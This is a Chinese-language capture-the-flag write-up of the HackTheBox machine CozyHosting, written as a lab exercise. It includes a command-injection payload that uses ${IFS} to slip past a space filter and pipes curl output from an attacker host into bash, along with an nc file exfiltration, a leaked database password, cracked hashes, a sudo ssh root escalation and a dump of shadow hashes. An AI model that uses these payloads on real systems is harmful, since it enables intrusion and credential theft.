基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.230
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-04 13:44 CST
Nmap scan report for 10.10.11.230
Host is up (0.10s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_  256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.06 seconds

80

需要加hosts:

1
10.10.11.230 cozyhosting.htb

Spring

随意输入,根据报错页面知道是spring:

actuator

很容易探测到actuator,burp开着apikit的话也直接自动出来了:

sessions

sessions中得到一个有效session:

Cozy Cloud

同样是前面api那里可以知道admin,使用得到的session可以访问admin:

executessh

connection setting那里看起来是使用指定的用户名通过ssh连接指定host:

命令注入

这种场景,测试存在命令注入,存在过滤例如不能出现空格,基础绕过:

reverse shell

利用命令注入得到app shell:

1
host=10.10.16.4&username=`curl${IFS}10.10.16.4:7777/shell|bash`

cloudhosting

得到的app目录中有一个jar包,下载下来分析:

1
2
3
app@cozyhosting:/app$ nc 10.10.16.4 4444 < cloudhosting-0.0.1.jar

nc -nvlp 4444 > cloudhosting-0.0.1.jar

发现postgresql连接信息:

1
2
3
4
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

postgresql

连接postgresql,获取信息:

1
2
3
4
5
6
7
8
9
psql -U postgres -W -h localhost

postgres=# \l
postgres=# \c cozyhosting
cozyhosting=# \dt
cozyhosting=# select * from users;

kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

得到的admin hash破解出密码:

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

manchesterunited

user flag

得到的密码就是josh用户密码,ssh登录:

提权信息

sudo ssh,基础的gtfobins:

提权 & root flag

直接根据gtfobins给出的命令:

1
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

shadow

1
2
root:$y$j9T$nK3A0N4wTEzopZkv8GQds0$NlR46AiiQOChoO1UNpiOYFIBHM7s956G8l8p/w15Sp2:19577:0:99999:7:::
josh:$y$j9T$QbN44OK6RyyP01EL9VkVU0$n/uszgmCRdbeaF9OiCVna63BwZCtG.SLHXEXVeluy.1:19498:0:99999:7:::

参考资料